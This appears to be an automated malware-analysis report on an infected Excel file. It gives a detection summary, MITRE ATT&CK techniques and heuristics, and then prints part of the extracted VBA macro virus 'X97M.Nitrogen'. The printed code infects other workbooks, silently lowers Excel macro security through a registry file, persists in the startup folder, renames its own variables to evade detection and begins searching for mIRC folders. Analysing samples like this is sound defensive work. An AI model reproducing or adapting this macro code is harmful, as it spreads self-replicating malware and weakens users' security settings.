MALICIOUS
240
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1140 Deobfuscate/Decode Files or Information
T1059 Command and Scripting Interpreter
The VBA macro attempts to disable Excel's macro security by writing a registry value to HKCU\Software\Microsoft\Office\9.0\Excel\Security\Level and setting it to 1. It also attempts to establish persistence by creating a file named 'Book.' in the Excel startup path and executing 'regedit /s C:\Protection.reg' to modify the registry. The ClamAV detection of Win.Worm.Godog-4 further supports the malicious nature of this file.
Heuristics 4
-
ClamAV: Win.Worm.Godog-4 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Worm.Godog-4
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9752 bytes |
SHA-256: f225b70b5fc5f4416c143dc723be446731ee02069658a40ea39e23b7de7c7b2f |
|||
|
Detection
ClamAV:
Win.Worm.Godog-4
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "EsteLivro"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'X97M.Nitrogen
'By ·KrïPt¤R·
Sub WorkBook_Activate()
Call WorkBook_DeActivate
End Sub
Sub WorkBook_DeActivate()
On Error Resume Next
Set QP6619 = ActiveWorkbook.VBProject.VBComponents.Item(1)
Set ST4I979 = Me.VBProject.VBComponents.Item(1)
If QP6619.CodeModule.Lines(1, 1) <> "'X97M.Nitrogen" Then
QP6619.CodeModule.insertlines 1, ST4I979.CodeModule.Lines(1, ST4I979.CodeModule.CountOfLines)
QP6619.Name = "EsteLivro"
End If
Open "C:\Protection.reg" For Output As #1
Print #1, "REGEDIT4"
Print #1, ""
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel]"
Print #1, """Options6""=dword:00000000"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security]"
Print #1, """Level""=dword:00000001"
Close #1
Shell "regedit /s C:\Protection.reg", vbHide: Kill ("C:\Protection.reg")
FJ397492 = Dir(Application.StartupPath & "\Book.")
If FJ397492 = "" Then
VBAProject.EsteLivro.SaveAs Filename:=Application.StartupPath & "\Book.", FileFormat:=xlNormal, AddToMru:=False
End If
Application.CommandBars("Tools").Controls(11).Delete
LL61LTAS (QN471657)
FC774323_QR344227
FJ74107
If Second(Now) = Minute(Now) Then
EG860806
End If
End Sub
Private Sub FC774323_QR344227()
On Error Resume Next
Randomize
Dim r1(1 To 36) As String
r1(1) = "QP6619": r1(2) = "LM320830": r1(3) = "PK446225": r1(4) = "PN543411": r1(5) = "QR344227": r1(6) = "FC774323": r1(7) = "ML652474": r1(8) = "BL810720": r1(9) = "BC33330": r1(10) = "OM239590": r1(11) = "DJ163619": r1(12) = "TK6874": r1(13) = "CF479771": r1(14) = "GL869566": r1(15) = "AL738775": r1(16) = "EO641461": r1(17) = "KF855428": r1(18) = "QR546310": r1(19) = "TK764384": r1(20) = "KL46613": r1(21) = "EG860806": r1(22) = "FJ74107": r1(23) = "AB65312": r1(24) = "CO179408": r1(25) = "JS117332": r1(26) = "RN483466": r1(27) = "LI140450": r1(28) = "GC2316": r1(29) = "NQ275360": r1(30) = "BA328324": r1(31) = "BQ8813": r1(32) = "PR464137": r1(33) = "IS509669": r1(34) = "NG189638": r1(35) = "HT682844": r1(36) = "FJ397492"
For x = 1 To 36
a1 = (Chr(65 + Int(Rnd * 20))) & (Chr(65 + Int(Rnd * 20))) & Int(Rnd * 900) & Int(Rnd * 900)
Call QR344227(a1, r1(x))
Next x
End Sub
Private Sub QR344227(BL810720, ML652474 As String)
On Error Resume Next
Dim QP6619 As Long: Dim LM320830 As Long: Dim PK446225 As Long: Dim PN543411 As Long: Dim BC33330 As Long: Dim OM239590 As Long: Dim DJ163619 As Long: Dim TK6874 As Long: Dim CF479771 As Long: Dim GL869566 As Long: Dim AL738775 As Long: Dim EO641461 As Long: Dim KF855428 As Long: Dim QR546310 As Long: Dim TK764384 As Long: Dim KL46613 As Long: Dim EG860806 As Long: Dim FJ74107 As Long: Dim AB65312 As Long: Dim CO179408 As Long: Dim JS117332 As Long: Dim RN483466 As Long: Dim LI140450 As Long: Dim GC2316 As Long: Dim NQ275360 As Long: Dim BA328324 As Long: Dim BQ8813 As Long: Dim PR464137 As Long: Dim IS509669 As Long: Dim NG189638 As Long: Dim HT682844 As Long: Dim FJ397492 As Long
With ActiveWorkbook.VBProject.VBComponents.Item(1).CodeModule
QP6619 = 1: LM320830 = 1: PK446225 = .CountOfLines: PN543411 = Len(.Lines(.CountOfLines, 1))
Do While .Find(ML652474, QP6619, LM320830, PK446225, PN543411, True)
s1 = .Lines(QP6619, 1)
s1 = Left(s1, LM320830 - 1) & BL810720 & Mid(s1, PN543411)
.replaceline QP6619, s1
QP6619 = PK446225 + 1: LM320830 = 1
PK446225 = .CountOfLines
PN543411 = Len(.Lines(.CountOfLines, 1))
Loop
End With
End Sub
Function LL61LTAS(QN471657)
Set PN543411 = CreateObject("ActiveWorkbook.FileSystemObject")
If LM320830 <> "" Then
J4J816NH = F717E3P1.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If PN543411.fileexists("c:\mirc\mirc.ini") Then
LM320830 = "c:\mirc"
ElseIf PN543411.fileexists("c:\mirc32\mirc.ini") Then
LM320830 = "c:\mirc3
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.